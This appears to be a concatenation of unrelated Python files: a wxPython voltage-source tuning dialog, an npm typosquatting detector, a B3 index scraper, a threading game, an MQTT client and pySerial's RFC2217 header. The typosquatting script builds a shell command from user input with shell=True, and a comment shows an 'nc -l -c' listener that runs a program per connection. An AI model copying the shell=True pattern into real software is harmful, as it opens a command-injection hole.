dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
def self_calbrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
thr = Thread(target=self.self_calbrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=8, cols=2)
panel_box.Add(ports_box)
for port in xrange(16):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
if port < 6:
spin = FloatSpin(self, value=0, min_val=-1, max_val=1, increment=1, digits=6)
elif port < 12:
spin = FloatSpin(self, value=0, min_val=-2.5, max_val=2.5, increment=1, digits=6)
else:
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
def self_calbrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
thr = Thread(target=self.self_calbrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
|
typosquatting.py
|
# Typosquatting Detection Scheme (npm)
from itertools import permutations
from functools import lru_cache
import re
delimiter_regex = re.compile('[\-|\.|_]')
delimiters = ['', '.', '-', '_']
version_number_regex = re.compile('^(.*?)[\.|\-|_]?\d$')
scope_regex = re.compile('^@(.*?)/.+$')
allowed_characters = 'abcdefghijklmnopqrstuvwxyz1234567890.-_'
typos = {
'1': ['2', 'q', 'i', 'l'],
'2': ['1', 'q', 'w', '3'],
'3': ['2', 'w', 'e', '4'],
'4': ['3', 'e', 'r', '5'],
'5': ['4', 'r', 't', '6', 's'],
'6': ['5', 't', 'y', '7'],
'7': ['6', 'y', 'u', '8'],
'8': ['7', 'u', 'i', '9'],
'9': ['8', 'i', 'o', '0'],
'0': ['9', 'o', 'p', '-'],
'-': ['_', '0', 'p', '.', ''],
'_': ['-', '0', 'p', '.', ''],
'q': ['1', '2', 'w', 'a'],
'w': ['2', '3', 'e', 's', 'a', 'q', 'vv'],
'e': ['3', '4', 'r', 'd', 's', 'w'],
'r': ['4', '5', 't', 'f', 'd', 'e'],
't': ['5', '6', 'y', 'g', 'f', 'r'],
'y': ['6', '7', 'u', 'h', 't', 'i'],
'u': ['7', '8', 'i', 'j', 'y', 'v'],
'i': ['1', '8', '9', 'o', 'l', 'k', 'j', 'u', 'y'],
'o': ['9', '0', 'p', 'l', 'i'],
'p': ['0', '-', 'o'],
'a': ['q', 'w', 's', 'z'],
's': ['w', 'd', 'x', 'z', 'a', '5'],
'd': ['e', 'r', 'f', 'c', 'x', 's'],
'f': ['r', 'g', 'v', 'c', 'd'],
'g': ['t', 'h', 'b', 'v', 'f'],
'h': ['y', 'j', 'n', 'b', 'g'],
'j': ['u', 'i', 'k', 'm', 'n', 'h'],
'k': ['i', 'o', 'l', 'm', 'j'],
'l': ['i', 'o', 'p', 'k', '1'],
'z': ['a', 's', 'x'],
'x': ['z', 's', 'd', 'c'],
'c': ['x', 'd', 'f', 'v'],
'v': ['c', 'f', 'g', 'b', 'u'],
'b': ['v', 'g', 'h', 'n'],
'n': ['b', 'h', 'j', 'm'],
'm': ['n', 'j', 'k', 'rn'],
'.': ['-', '_', '']
}
# Set containing the names of all packages considered to be popular
popular_packages = set(open('../data/npm_popular_packages').read().splitlines())
# pandas dataframe containing the names and download counts of all packages, call scan_all_init to initialize
packages_df = None
all_packages = None
# check if two packages have the same scope
def same_scope(p1, p2):
p1_match = scope_regex.match(p1)
p2_match = scope_regex.match(p2)
if p1_match is None or p2_match is None:
return False
return p1_match.group(1) == p2_match.group(1)
# 'reeact' => 'react'
def repeated_characters(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i, c in enumerate(package_name):
if i + 1 < len(package_name) and package_name[i + 1] == c:
s = package_name[:i] + package_name[i + 1:]
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'evnt-stream' -> 'event-stream'
def omitted_chars(package_name, return_all=False, package_list=popular_packages):
if len(package_name) < 4:
return None
if return_all:
candidates = []
for i in range(len(package_name) + 1):
for c in allowed_characters:
s = package_name[:i] + c + package_name[i:]
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'loadsh' => 'lodash'
def swapped_characters(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i in range(len(package_name) - 1):
a = list(package_name)
t = a[i]
a[i] = a[i + 1]
a[i + 1] = t
s = ''.join(a)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'stream-event' => 'event-stream'
# 'event.stream' => 'event-stream'
# 'de-bug' => 'debug'
def swapped_words(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
if delimiter_regex.search(package_name) is not None:
tokens = delimiter_regex.sub(' ', package_name).split()
if len(tokens) > 8:
return None
for p in permutations(tokens):
for d in delimiters:
s = d.join(p)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# '1odash' => 'lodash'
# 'teqeusts' => 'requests'
def common_typos(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i, c in enumerate(package_name):
if c in typos:
for t in typos[c]:
s = list(package_name)
s[i] = t
s = ''.join(s)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'react-2' => 'react'
# 'react2' => 'react'
def version_numbers(package_name, package_list=popular_packages):
m = version_number_regex.match(package_name)
if m is not None:
s = m.group(1)
if s in package_list and not same_scope(package_name, s) and s != package_name:
return s
return None
# run all tests on given package name, return potential typosquatting targets
def run_tests(package_name):
if package_name not in popular_packages:
results = [
repeated_characters(package_name),
omitted_chars(package_name),
swapped_characters(package_name),
swapped_words(package_name),
common_typos(package_name),
version_numbers(package_name)
]
# remove None's
results = list(filter(lambda x: x is not None and x is not '', results))
# flatten
r = []
for s in results:
if type(s) == list:
for e in s:
r.append(e)
else:
r.append(s)
results = list(set(r))
if len(results) != 0:
return results
return None
# run all tests on given package name, return potential typosquatting targets
def run_tests_show_all(package_name):
if all_packages is None:
scan_all_init()
results = [
repeated_characters(package_name, return_all=True, package_list=all_packages),
omitted_chars(package_name, return_all=True, package_list=all_packages),
swapped_characters(package_name, return_all=True, package_list=all_packages),
swapped_words(package_name, return_all=True, package_list=all_packages),
common_typos(package_name, return_all=True, package_list=all_packages),
version_numbers(package_name, package_list=all_packages)
]
# remove None's
results = list(filter(lambda x: x is not None and x is not '', results))
# flatten
r = []
for s in results:
if type(s) == list:
for e in s:
r.append(e)
else:
r.append(s)
results = list(set(r))
if len(results) != 0:
return results
return None
# get results corresponding to each signal
def run_tests_get_signals(package_name):
if package_name not in popular_packages:
return {
'repeated_chars': repeated_characters(package_name),
'omitted_chars': omitted_chars(package_name),
'swapped_chars': swapped_characters(package_name),
'swapped_words': swapped_words(package_name),
'common_typos': common_typos(package_name),
'version_numbers': version_numbers(package_name)
}
else:
return None
# set up tools required for scanning all packages
def scan_all_init():
global pd
import pandas as pd
global packages_df
packages_df = pd.read_csv('../data/npm_download_counts.csv')
global all_packages
all_packages = set(packages_df.package_name.values)
global threading
import threading
global lock
lock = threading.Lock()
# gets download count for given package
def get_download_count(package_name):
if packages_df is None:
scan_all_init()
if package_name not in packages_df.package_name.values:
return 0
return packages_df.loc[packages_df.package_name == package_name].weekly_downloads.values[0]
# split list into evenly sized chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
# returns the most popular package with a name that could be typosquatting the given package
@lru_cache(maxsize=10000)
def get_most_popular_candidate(package_name):
candidates = run_tests_show_all(package_name)
if candidates is None:
return None
# get most popular target
most_popular_candidate = candidates[0]
popularity = get_download_count(candidates[0])
for c in candidates:
if get_download_count(c) > popularity:
most_popular_candidate = c
popularity = get_download_count(c)
return most_popular_candidate
# thread target function used to scan all packages
def scan_all_thread_target(lines, log):
counter = 0
for line in lines:
tokens = line.split(',')
package_name = tokens[0]
dependencies = tokens[1:]
final_string = package_name
for dependency in dependencies:
candidate = get_most_popular_candidate(dependency)
if candidate is not None:
final_string += (',' + dependency + ',' + candidate)
final_string += '\n'
lock.acquire()
log.write(final_string)
counter += 1
if counter == 100:
log.flush()
counter = 0
lock.release()
# scan all pacakges for transitive results
def scan_all(dependencies_filename, transitive_output_filename, threads):
if all_packages is None:
scan_all_init()
n_threads = threads
threads = []
# get most popular typosquatting target for every package in the given list
lines = open(dependencies_filename).read().splitlines()
log = open(transitive_output_filename, 'a')
all_chunks = chunks(lines, int(len(lines) / n_threads) + 1)
for _ in range(n_threads):
current_chunk = next(all_chunks)
t = threading.Thread(target=scan_all_thread_target, args=(current_chunk,log,))
t.start()
threads.append(t)
for t in threads:
t.join()
log.close()
# get signal count statistics
def get_signal_counts():
if all_packages is None:
scan_all_init()
log = open('../data/npm_signal_counts', 'w')
log.write('package_name,weekly_downloads,repeated_characters,omitted_characters,swapped_characters,swapped_words,common_typos,version_numbers\n')
for package in all_packages:
package_name = str(package)
results = run_tests_get_signals(package_name)
if results is not None:
if set(results.values()) != {None}:
final_string = package_name + ',' + str(get_download_count(package_name))
final_string += ',' + ','.join(['' if x is None else x for x in results.values()])
final_string += '\n'
log.write(final_string)
log.close()
if __name__ == '__main__':
import sys
if sys.argv[1] is None:
print('Usage: py typosquatting_transitive.py [package_name]')
exit(1)
import subprocess
stdout = subprocess.check_output('node get_npm_deps_cli.js {}'.format(sys.argv[1]), shell=True).decode('utf8')
dependencies = stdout.split('Dependencies:\n')[1].splitlines()
alert = False
for dependency in dependencies:
r = run_tests(dependency)
if r is not None:
alert = True
print('Dependency \'{}\' could be typosquatting {}'.format(dependency, set(r)))
if alert == False:
print('No typosquatting detected for \'{}\''.format(sys.argv[1]))
|
b3_indexes.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 10 22:00:13 2018
@author: Gaston Guillaux
"""
import os
import time
import shutil
import requests
import pandas as pd
from threading import Thread
from datetime import datetime
from bs4 import BeautifulSoup as bs
#export to csv ibovespa composition
def get_ibov():
now = datetime.now()
url = r'http://bvmf.bmfbovespa.com.br/indices/ResumoCarteiraQuadrimestre.aspx?Indice=IBOV&idioma=en-us'
ibov_html = requests.get(url)
ibov_df_list = pd.read_html(ibov_html.text)
ibov_df = ibov_df_list[0]
csv_file = r'c:\temp\auxpy\ibov_' + now.strftime('%Y-%m-%d_%H%M%S.csv')
ibov_df.to_csv(csv_file, index=False)
#==================================================================================================
#get url of all b3 indexes
def get_b3_indexes_urls():
url = 'http://www.bmfbovespa.com.br/pt_br/produtos/indices/'
indices = {}
pagina_indices = requests.get(url)
soup = bs(pagina_indices.text, 'html.parser')
hrefs = [href for href in soup.select('a[href*="indice"]') if href.getText() == 'Saiba mais']
for i in hrefs:
aux = i['href'].replace('./','')
link = url + aux
name = i.parent.parent.parent.select('.subheader')[0].getText()
indices[name] = {}
indices[name]['url'] = link
return indices
def get_url(index, indexes):
url = indexes[index]['url']
pagina = requests.get(url)
soup = bs(pagina.text, 'html.parser')
try:
href = soup.select('a[href*="composicao"]')[0]['href'].replace('./', '')
indexes[index]['composition'] = trim_url(url) + href
except Exception as e:
indexes[index]['composition'] = '*** failed to get composition *** . Error message = ' + str(e)
def get_b3_indexes_composition_url():
indexes = get_b3_indexes_urls()
threads = []
for index in indexes:
t = Thread(target=get_url, args=([index, indexes]))
threads.append(t)
t.start()
[t.join() for t in threads]
return indexes
#==================================================================================================
def get_composition(i, indexes, csv_path):
try:
comp = indexes[i]['composition']
if 'failed' not in comp:
soup = bs(requests.get(comp).text, 'html.parser')
frame_html = soup.select('iframe[src*="bovespa"]')[0]['src'].replace('pt-br', 'en-us')
print(frame_html)
comp_df = pd.read_html(requests.get(frame_html).text)[0]
last_col = comp_df.columns[len(comp_df.columns)-1]
agora = datetime.now().strftime('_%d-%b-%Y_%H%M%S.csv')
df_index = comp_df.sort_values(last_col, ascending=False)
df_index.to_csv(os.path.join(csv_path, i + agora), index=False)
indexes[i]['dataframe'] = df_index
else:
print(i + ' failed')
indexes[i]['dataframe'] = '*** no dataframe ***'
except:
indexes[i]['dataframe'] = '*** no dataframe ***'
def get_index_composition_csv(indexes):
csv_path = r'c:\temp\auxpy'
shutil.rmtree(csv_path, ignore_errors=True)
os.makedirs(csv_path, exist_ok=True)
threads = []
for i in indexes:
t = Thread(target=get_composition, args=([i, indexes, csv_path]))
threads.append(t)
t.start()
[t.join() for t in threads]
#==================================================================================================
def trim_url(url):
last_slash = url[::-1].find('/')
clean_url = url[:len(url) - last_slash]
return clean_url
if __name__ == '__main__':
start = time.perf_counter()
urls = get_b3_indexes_composition_url()
get_index_composition_csv(urls)
end = time.perf_counter()
print('{} seconds'.format(end-start))
|
Hilos1.py
|
import threading
import sys
import time
from random import randint
print('SUPER THREADING GAME v0.1 By Iván Sánchez')
print()
# Declaramos nuestras variables globales para guardar los numeros aleatorios
number1 = 0
number2 = 0
ejecutarHilo_1 = True
ejecutarHilo_2 = True
# Declaramos la función que genera un nuevo número aleatorio
def generate_random_number():
return randint(1, 99)
def hilo1():
global number1, ejecutarHilo_1
time.sleep(100 / generate_random_number())
while ejecutarHilo_1:
number1 = generate_random_number()
print('Hilo 1: ' + str(number1))
print('')
time.sleep(3)
def hilo2():
global number2, ejecutarHilo_2
time.sleep(100 / generate_random_number())
while ejecutarHilo_2:
number2 = generate_random_number()
print('Hilo 2: ' + str(number2))
print('')
time.sleep(3)
print('Muy bien, las instrucciones son simples. En la pantalla apareceran numeros aleatorios entre el 0 y el 100')
print('Tu mision (si decides aceptarla 8) sera intruducir esos valores antes de que el tiempo termine')
print('Si no logras ingresar los valores, el juego continuara generando números aleatorios')
start = input('>> ¿Deseas comenzar el desafio? (yes) (y/n): ')
if start == 'n' or start == 'no':
print('Ahh... que nena :(')
sys.exit()
print()
print('Ready? Goo!')
print()
time.sleep(1)
start_time = time.time()
hilo_1 = threading.Thread(target=hilo1)
hilo_1.start()
hilo_2 = threading.Thread(target=hilo2)
hilo_2.start()
while hilo_1.isAlive() or hilo_2.isAlive():
isThisNumber = int(input(''))
if isThisNumber == number1:
ejecutarHilo_1 = False
print('Bien mataste al hilo 1')
print('')
elif isThisNumber == number2:
ejecutarHilo_2 = False
print('Bien mataste al hilo 2')
print('')
else:
print('Uy, que lento!')
final_time = time.time() - start_time
print('Has terminaado con todos los hilos ¡Felicidades!')
print('/---------------------------------------------------\ ')
print('| SCORE / PUNTUACION |')
print('|---------------------------------------------------| ')
print('|----------|----------------------------------------| ')
print('| Time | ' + str(final_time) + ' Seg |')
print('\----------|----------------------------------------/ ')
|
mqtt.py
|
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
import paho.mqtt.client as mqtt
import a10.structures.identity
import a10.asvr.db.configuration
import threading
import time
def on_disconnect(client, userdata, rc):
logging.info("disconnecting reason " + str(rc))
client.connected_flag = False
client.disconnect_flag = True
def on_connect(client, metadata, flags, rc):
print("Connected mqtt: {}".format(rc))
def on_disconnect(client, metadata, flags, rc):
print("MQTT Disconnected")
try:
client.reconnect()
except:
print("Connection is fscked")
def publish(ch, t, op, data):
payload = str({"t": t, "op": op, "data": data})
mqttc.publish(ch, payload)
def sendKeepAlive():
print(
"Starting keepalive ping with rate ",
a10.asvr.db.configuration.MQTTKEEPALIVEPING,
)
while True:
print("ping!")
publish(
"AS/MQTTPING",
"ping",
"ping",
{"session": a10.asvr.db.configuration.ASSESSIONIDENTITY},
)
time.sleep(int(a10.asvr.db.configuration.MQTTKEEPALIVEPING))
print(a10.asvr.db.configuration.MQTTADDRESS)
#
# This is a bit nasty, but if two clients have the same name then the earlier one
# will be kicked off by the MQTT broker - at least in mosquitto
# So we will add the AS_Session_Identity and a UUID
#
id = (
a10.asvr.db.configuration.MQTTCLIENTNAME
+ "_"
+ a10.asvr.db.configuration.ASSESSIONIDENTITY
+ "_"
+ a10.structures.identity.generateID()
)
print("mqtt client id is ", id)
mqttc = mqtt.Client(id)
mqttc.on_connect = on_connect
mqttc.connect(a10.asvr.db.configuration.MQTTADDRESS, port=a10.asvr.db.configuration.MQTTPORT)
# KEEP ALIVE PING
print("Starting keep alive thead")
keepalivethread = threading.Thread(target=sendKeepAlive)
print("Keep alive thread ID is ", keepalivethread)
keepalivethread.start()
|
rfc2217.py
|
#! python
#
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# see __init__.py
#
# This module implements a RFC2217 compatible client. RF2217 descibes a
# protocol to access serial ports over TCP/IP and allows setting the baud rate,
# modem control lines etc.
#
# (C) 2001-2013 Chris Liechti <cliechti@gmx.net>
# this is distributed under a free software license, see license.txt
# TODO:
# - setting control line -> answer is not checked (had problems with one of the
# severs). consider implementing a compatibility mode flag to make check
# conditional
# - write timeout not implemented at all
##############################################################################
# observations and issues with servers
#=============================================================================
# sredird V2.2.1
# - http://www.ibiblio.org/pub/Linux/system/serial/ sredird-2.2.2.tar.gz
# - does not acknowledge SET_CONTROL (RTS/DTR) correctly, always responding
# [105 1] instead of the actual value.
# - SET_BAUDRATE answer contains 4 extra null bytes -> probably for larger
# numbers than 2**32?
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: while true; do nc -l -p 7000 -c "sredird debug /dev/ttyUSB0 /var/lock/sredir"; done
#=============================================================================
# telnetcpcd (untested)
# - http://ftp.wayne.edu/kermit/sredird/telnetcpcd-1.09.tar.gz
# - To get the signature [COM_PORT_OPTION] w/o data has to be sent.
#=============================================================================
# ser2net
# - does not negotiate BINARY or COM_PORT_OPTION for his side but at least
# acknowledges that the client activates these options
# - The configuration may be that the server prints a banner. As this client
# implementation does a flushInput on connect, this banner is hidden from
# the user application.
# - NOTIFY_MODEMSTATE: the poll interval of the server seems to be one
# second.
# - To get the signature [COM_PORT_OPTION 0] has to be sent.
# - run a server: run ser2net daemon, in /etc/ser2net.conf:
# 2000:telnet:0:/dev/ttyS0:9600 remctl banner
##############################################################################
# How to identify ports? pySerial might want to support other protocols in the
# future, so lets use an URL scheme.
# for RFC2217 compliant servers we will use this:
# rfc2217://<host>:<port>[/option[/option...]]
#
# options:
# - "debug" print diagnostic messages
# - "ign_set_control": do not look at the answers to SET_CONTROL
# - "poll_modem": issue NOTIFY_MODEMSTATE requests when CTS/DTR/RI/CD is read.
# Without this option it expects that the server sends notifications
# automatically on change (which most servers do and is according to the
# RFC).
# the order of the options is not relevant
from serial.serialutil import *
import time
import struct
import socket
import threading
import queue
import logging
# port string is expected to be something like this:
# rfc2217://host:port
# host may be an IP or including domain, whatever.
# port is 0...65535
# map log level names to constants. used in fromURL()
LOGGER_LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
}
# telnet protocol characters
IAC = to_bytes([255]) # Interpret As Command
DONT = to_bytes([254])
DO = to_bytes([253])
WONT = to_bytes([252])
WILL = to_bytes([251])
IAC_DOUBLED = to_bytes([IAC, IAC])
SE = to_bytes([240]) # Subnegotiation End
NOP = to_bytes([241]) # No Operation
DM = to_bytes([242]) # Data Mark
BRK = to_bytes([243]) # Break
IP = to_bytes([244]) # Interrupt process
AO = to_bytes([245]) # Abort output
AYT = to_bytes([246]) # Are You There
EC = to_bytes([247]) # Erase Character
EL = to_bytes([248]) # Erase Line
GA = to_bytes([249]) # Go Ahead
SB = to_bytes([250]) # Subnegotiation Begin
# selected telnet options
BINARY = to_bytes([0]) # 8-bit data path
ECHO = to_bytes([1]) # echo
SGA = to_bytes([3]) # suppress go ahead
# RFC2217
COM_PORT_OPTION = to_bytes([44])
# Client to Access Server
SET_BAUDRATE = to_bytes([1])
SET_DATASIZE = to_bytes([2])
SET_PARITY = to_bytes([3])
SET_STOPSIZE = to_bytes([4])
SET_CONTROL = to_bytes([5])
NOTIFY_LINESTATE = to_bytes([6])
NOTIFY_MODEMSTATE = to_bytes([7])
FLOWCONTROL_SUSPEND = to_bytes([8])
FLOWCONTROL_RESUME = to_bytes([9])
SET_LINESTATE_MASK = to_bytes([10])
SET_MODEMSTATE_MASK = to_bytes([11])
PURGE_DATA = to_bytes([12])
SERVER_SET_BAUDRATE = to_bytes([101])
SERVER_SET_DATASIZE = to_bytes([102])
SERVER_SET_PARITY = to_bytes([103])
SERVER_SET_STOPSIZE = to_bytes([104])
SERVER_SET_CONTROL = to_bytes([105])
SERVER_NOTIFY_LINESTATE = to_bytes([106])
SERVER_NOTIFY_MODEMSTATE = to_bytes([107])
SERVER_FLOWCONTROL_SUSPEND = to_bytes([108])
SERVER_FLOWCONTROL_RESUME = to_bytes([109])
SERVER_SET_LINESTATE_MASK = to_bytes([110])
SERVER_SET_MODEMSTATE_MASK = to_bytes([111])
SERVER_PURGE_DATA = to_bytes([112])
RFC2217_ANSWER_MAP = {
SET_BAUDRATE: SERVER_SET_BAUDRATE,
SET_DATASIZE: SERVER_SET_DATASIZE,
SET_PARITY: SERVER_SET_PARITY,
SET_STOPSIZE: SERVER_SET_STOPSIZE,
SET_CONTROL: SERVER_SET_CONTROL,
NOTIFY_LINESTATE: SERVER_NOTIFY_LINESTATE,
NOTIFY_MODEMSTATE: SERVER_NOTIFY_MODEMSTATE,
FLOWCONTROL_SUSPEND: SERVER_FLOWCONTROL_SUSPEND,
FLOWCONTROL_RESUME: SERVER_FLOWCONTROL_RESUME,
SET_LINESTATE_MASK: SERVER_SET_LINESTATE_MASK,
SET_MODEMSTATE_MASK: SERVER_SET_MODEMSTATE_MASK,
PURGE_DATA: SERVER_PURGE_DATA,
}
SET_CONTROL_REQ_FLOW_SETTING = to_bytes([0]) # Request Com Port Flow Control Setting (outbound/both)
